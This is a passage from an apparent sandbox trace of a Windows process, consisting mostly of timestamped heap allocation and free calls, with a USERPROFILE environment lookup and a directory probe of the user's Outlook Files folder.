out: hHeap=0x2af0000) returned 1 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0219.587] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab068 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.588] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854380 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0219.588] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.588] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72358 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaed0 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0219.589] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0219.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0219.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0219.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.590] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0219.590] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0219.591] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0219.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0219.591] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0219.591] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0219.591] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.592] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0219.592] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0219.593] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0219.593] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0219.594] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0219.594] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0219.594] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0219.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0219.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0219.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0219.595] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0219.595] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0219.595] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Outlook Files", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa87f514a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0xddc1fe1e, ftLastWriteTime.dwHighDateTime=0x1d327c8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 0x9e2078 [0219.596] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0219.596] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: 